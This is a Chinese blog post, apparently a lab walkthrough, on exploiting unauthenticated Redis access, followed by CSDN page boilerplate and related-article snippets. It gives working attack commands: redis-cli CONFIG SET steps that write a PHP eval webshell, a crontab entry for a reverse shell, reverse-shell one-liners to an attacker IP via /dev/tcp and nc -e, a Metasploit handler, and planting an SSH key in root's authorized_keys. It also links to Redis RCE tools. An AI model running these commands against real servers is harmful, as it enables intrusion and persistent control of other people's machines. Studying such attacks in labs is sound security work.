Redis未授权访问漏洞之反弹连接,SSH Key免密登陆,Webshell提权

最新推荐文章于 2024-05-09 00:07:21 发布
最新推荐文章于 2024-05-09 00:07:21 发布
阅读量806 收藏 1
点赞数
分类专栏: WEB网络安全 文章标签: redis 数据库 database 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60115503/article/details/124663071
版权

Redis简介

如果看了本文章并不是很了解可以去看看(2条消息) Redis基本使用,键(key)命令|Redis持久化|Redis动态修改配置_恰恰想学习的博客-CSDN博客

REmote DIctionary Server(Redis)是一个由Salvatore Sanfilippo写的key-value存储系统,是跨平台的非关系型数据库(端口:6379)

存储缓存用的数据 需要高速读/写的场合使用它快速读/写

什么是Redis未授权访问漏洞?

Redis默认情况下,会绑定0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样会将Redis服务暴露在公网上,如果在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据,攻击者在未授权访问Redis的情况下,利用Redis自身提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器/root/.ssh文件夹的authotrized_keys文件中,进而可以使用对应私钥直接使用ssh服务登陆目标服务器

外网Redis配置

找到redis中的redis.cof文件并打开:
    修改protectd-mode为no
    将#bind 127.0.0.1修改为bind 127.0.0.1
    修改daemonize属性为yes
daemonize:yes:redis采用的是单进程多线程的模式。当redis.conf中选项daemonize设置成yes时,代表开启守护进程模式。在该模式下,redis会在后台运行,并将进程pid号写入至redis.conf选项pidfile设置的文件中,此时redis将一直运行,除非手动kill该进程。
daemonize:no: 当daemonize选项设置成no时,当前界面将进入redis的命令行界面,exit强制退出或者关闭连接工具(putty,xshell等)都会导致redis进程退出。

开放端口6379:
    iptables -I INPUT -p tcp --dport 6379 -j ACCEPT

环境下载

http://download.redis.io/releases/redis-2.8.17.tar.gz

解压后输入make

复现

        编辑redis.conf

         修改daemonize为yes

        将#bind 127.0.0.1中的#删除 

         启动redis服务,并且开启6379端口

同样我们在攻击机上也安装并且进行make

连接靶机的redis

 

检测是否可以正常执行 

 

利用redis写webshell 

        复现条件

靶机redis链接未授权,我们可以通过外网直接访问,并且不需要输入密码
开通了http服务,知道了服务器网站目录的路径,可以通过文件遍历,上传,phpinfo,路径爆破等

       webshell提权命令

/redis-cli -h 192.168.1.1 -p 6379
    远程登陆redis数据库
config set dir var/html/www/
    设置redis备份键值持久化的路径
config set dbfilename shell.php
    将持久化文件名字更改为shell.php
set set "<?php @eval($_POST[test];)?>"

        我们在靶机当前目录开启了一个http服务

 

接着我们回到攻击机上 输入config set dir /root/Desktop

 

输入config set dbfilename shell.php 

输入set djx "<?php phpinfo();?>" 

进行保存save 

接着我们返回浏览器刷新发现出现一个shell.php 

 

 接着我们去访问

 这就是一次webshell获取的步骤

Crontab反弹shell

通过 crontab 命令,我们可以在固定的间隔时间执行指定的系统指令或 shell script 脚本。时间间隔的单位可以是分钟、小时、日、月、周的任意组合

 Crontab格式

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed

Crontab反弹shell思路:

        通过攻击机端口监听,在redis未授权的情况下编辑我们的持久化文件和名称 通过set 键中的值去写入到/var/spool/cron 将dbfilename文件名称更改为root通过设置的任务去请求我们的攻击机从而获得反弹shell

Cron文件存储路径
路径内容
/var/spool/cron这个文件负责安排由系统管理员制定的维护系统以及其他任务的crontab
/etc/crontab放的是对应周期的任务dalily,hourly,monthly,weekly

Linux crontab命令

命令操作
crontab -u root -r删除某个用户的任务
crontab -u root -l列举某个用户的任务
crontab -u root -e编辑某个用户的任务
crontab -u root time.cron把文件添加到某个用户的任务

攻击机常见监听方式

类型命令
netcatnc -lvvp port
msf

msfconsole 

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.18.1.1

set lport port

run

socatsocat TCP-LISTEN:7777 

常见建立反弹连接的方式

类型命令
linux bashbash -i >& /dev/tcp/192.168.142.144/7777 0>&1
netcatnc -e /bin/bash 192.168.1.1 7777

特殊文件/dev/tcp,打开这个文件就类似于发出了一个socket的调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据

Redis反弹连接详情:

连接redis,设置持久化路径为/var/spool/cron

 更改dbfilename文件名为root

攻击机设置监听端口7777 

 

设置键值任务计划值并且保存 等待1分钟后

Redis SSH key免密登陆

靶机开启ssh服务sudo service ssh start 

并且在/root/文件夹中有.ssh目录没有请自行创建mkdir /root/.ssh

当redis以root身份运行,可以给root账户写入SSH公钥文件,直接通过SSH登录目标服务器       

攻击机生成密钥对(公钥,私钥)

客户端把公钥发给服务端保存

客户端用私钥加密消息,发给服务端

服务端用公钥解密,解密成功,说明密钥匹配

客户端免密登陆成功

 攻击机生成密钥对ssh-keygen

 进入存放密钥的路径找到公钥authorized_keys 将里面的值复制一下

 

将公钥的值放在靶机redis里面\n是换行的意思

\n\n ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC5j6OSioyj1AdNH2wSs9vC0ta+1ZZjHwFOZeI974xAMt7awC50covqX/s34pl3+PUewENS6vHrGp40csmUmb0Hd1390df5KUMkI4DxN2TicPeg9+DdjwY7j0V5T/5VfBrTYmItj+MstUyNoYzxKac+Npx5OtsoRqFYwPcXLB/EL5Fl+LZUFP3HzLsS7KkVSCtcxbv6Lx4BqnPPBednIJIjuJ1Wlh8BkEYUnqSOPzOZCJJ0kvMe4RmJrSafcf9q+Ifx2pUkw0ZxYwPjt8yvISZKvPlxOd8TY2Joa6lnmKEhTd/t94SzBCAoHi3zmOcKEaRV7foyvUFvTDZvmPpvVTRZYW8PEbFc/LxwJvIKnypm4t5aqSDhWetR+lud9Qc1jpktAOx9UIA1jlvEwmN08iyE61o4TPv/RLVvTRfE/3DN2kNAKIdU47QEqKL0TKQ85BrSFk5Jjry/EfRwjtn1ZUS4mk0fWZVOopy2WcqUUlEaMoQfTQmOJqR3pqLiLSwi37s= root@kali\n\n

 设置持久化路径和持久化文件名称

最后连接即可 ssh -i id_rsa root@192.168.1.1 

Redis其他利用方式

        基于主从复制的RCE(Remote Code Execution)

GitHub - n0b0dyCN/redis-rogue-server: Redis(<=5.0.5) RCE

.https://github.com/Ridter/redis-rce

        jackson反序列化利用

        lua RCE

        Redis密码爆破

QiaN_djx
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis-desktop redis管理工具 支持SSH 各种系统
11-26
redis可视化工具,亲测可用,整理了一些各个系统的安装包,支持ssh远程连接
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
反弹shell的正向连接和反向连接
qq_44833342的博客
05-29 386
攻击者通过该连接获得对目标计算机的控制权。在正向连接中,攻击者需要知道目标计算机的IP地址和端口号,通过这些信息建立连接。而在反向连接中,目标计算机会向攻击者的计算机发起连接请求,攻击者只需要监听该请求即可建立连接。因此,反弹shell的反向连接更难被防御和检测,也更容易在网络中隐藏攻击者的身份。反弹shell是一种攻击技术,可以在授权的情况下远程控制目标计算机。正向连接是攻击者与目标计算机之间建立的连接,反向连接是目标计算机与攻击者之间建立的连接,攻击者通过该连接发送命令来控制目标计算机。
Redis授权访问
npc88888的博客
05-09 1403
在 Reids 4.x 之后,Redis新增了模块功能,通过外部拓展,可以实现在redis中实 现一个新的Redis命令,通过c语言编译并加载恶意.so文件,达到代码执行的目的。更改目标服务器Redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh):config set dir /root/.ssh。原文链接:https://blog.csdn.net/weixin_45605352/article/details/118790775。进入/root/.ssh目录: 将生成的公钥保存到。
PHP后门反弹连接DVWA
m0_57379855的博客
03-31 3279
PHP后门反弹连接DVWA环境准备操作系统准备DVWA靶场准备metasploit配置监控及攻击载荷配置监控配置攻击载荷生成php后门上传后门文件后渗透获取数据库信息 环境准备 操作系统准备 kali : 192.168.202.133 win10:192.168.202.139 DVWA靶场准备 DVWA下载 注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境 设置网站 配置数据库密码 与数据库设置保持一致 metasploit配置监控及攻击载荷 配置监控 使用handle
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 2305
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
攻击Redis
mole_exp的博客
05-10 1360
文章目录通过写文件getshell通过主从复制getshell参考 通过写文件getshell 通过主从复制getshell 参考 [1] https://paper.seebug.org/975/ [2] https://mp.weixin.qq.com/s?__biz=MjM5Njc1OTYyNA==&mid=2450775177&idx=1&sn=60f333eab252e78452f93c129c566939&scene=21#wechat_redirect [3]
【运维】ssh tunneling 依靠ssh的22端口实现访问远程服务器的接口服务
q742971636的博客
07-22 648
相当于是我访问了windows的7001端口,然后moba给我转到了sshserver上,并且sshserver其实就是跳板机,能访问到7001,直接就建立起windows到sshserver的7001连接了。在阿里云远程Linux的服务器只开通了22端口还不能开别的端口,我在Linux开个7001的接口服务后,我在本地windows系统能够通过22端口访问到这个7001接口服务吗?...
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
python脚本实现Redis授权批量提权
09-09
在提供的代码片段中,`hackredis.py` 是一个 Python 脚本,用于自动化对目标主机进行 Redis 授权提权的尝试。脚本使用了 `argparse` 库处理命令行参数,如目标 IP 列表 (`-l IPLIST`)、Redis 默认端口 (`-p PORT`)...
redis攻防-ssh登录、主从复制、授权访问、计划任务、写webshell
weixin_46626737的博客
06-30 641
cat key.txt | redis-cli -h 192.168.214.138 --pass(有密码则加,没密码不用) 123456 -x set wang。原理是:利用redis数据库将生成的ssh公钥发送到某一个用户./ssh目录下,然后直接利用ssh的私钥连接即可。主从模式,一个redis机器充当主机,可以进行写数据操作,其他的redis机器充当从机,只可以进行读操作。查看数据库中的内容:keys * (redis数据库没有表,是大量的键值对组成的)3)开启保护模式(protect-mode)
反弹连接后门反弹连接后门
06-25
反弹连接后门反弹连接后门反弹连接后门反弹连接后门
Redis webshell详解
m0_54313550的博客
04-19 460
"set 1 {}".format(shell.replace(" ","${IFS}")), //php代码空格替换成Linux系统服务器识别的空格,redis服务器也是linux系统////python insert 第一个参数0,表示从头部插入,AUTH redis命令 "AUTH{}".format 表示redis认证格式//path="/var/www/html" // url路径下面:/var/www/html ===/(根目录) -----//
redis授权访问--拿webshell以及实现ssh免密登录
Xiaolisec的博客
08-30 682
redis是一个非常快速的,开源的、支持网络、可基于内存亦可持久化的日志型、非关系类型的数据库;提供多种语言的 API,java/c/c++/c#/php/javascript/
ssrf,利用redis反弹shell
qq_67757718的博客
03-20 429
在docker中搭建容器,利用ssrf的漏洞攻击redis服务反弹shell
nc 反弹链接
diankui6178的博客
09-06 211
nc -l -v -p 80在本机监听80端口,此时80端口是打开的,我们可以在浏览器输入127.0.0.1进行浏览,此时就会出现连接,我们再在监听窗口输入字符,就会在浏览器上显示了。知道上面的作用后,我们就可以在此的基础上,再在webshell里面执行 nc -e cmd.exe 192.168.246.1 80此条命令会把cmd反弹到192.168.246.1上,我们就可以想在本...
Redis 安装以及配置隧道连接
qq_53332052的博客
08-04 1044
1.CentOS 1. 安装Redis 2. Redis 启动和停⽌ 3. 操作Redis 2.Ubuntu 1. 安装Redis 2. Redis 启动/停⽌ 3. 操作 Redis 3.开启隧道 3.1 Xshell 配置隧道 3.2 windTerm 配置隧道 3.3 FinalShell 配置隧道 4.可视化客户端连接
ssh反向连接和简单实现
XXXX的专栏
08-19 3176
SSH反向连接的使用 1、什么是反向连接? 反向连接是指主机A(受控端)主动连接主机B(控制端),在主机A和主机B之间建立一个远程连接,通过这个连 接主机B可以主动的向主机A发送一些请求。 2、为什么需要主机A主动去连接主机B呢? 这是因为主机A在局域网内,如果没有对主机A进行端口映射,对于主机B来说主机A是不可见的,如果在主机B这 边向主机A发送连接请求,这个请求是不可达的。
Redis授权四种利用方式与修复方案
qq_45234543的博客
11-08 5115
想整理一波Redis利用方式,在内网中很容易遇见(方便运维人员) 简介:redis是一个key-value存储系统,nosql - 非关系型数据库,支持存储的value类型相对更多,包括string、list、set、zset和hash。这些数据类型都支持push/pop、add/remove及交并差和更丰富的操作,且操作都是原子性。为了保证效率,数据都是缓存在内存中,区别是redis会周期性的把更新的数据写入磁盘或者把修改写入追加的记录文件,并在这个基础上实现了master-slave(主从)同步
Redis授权访问漏洞
最新发布
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值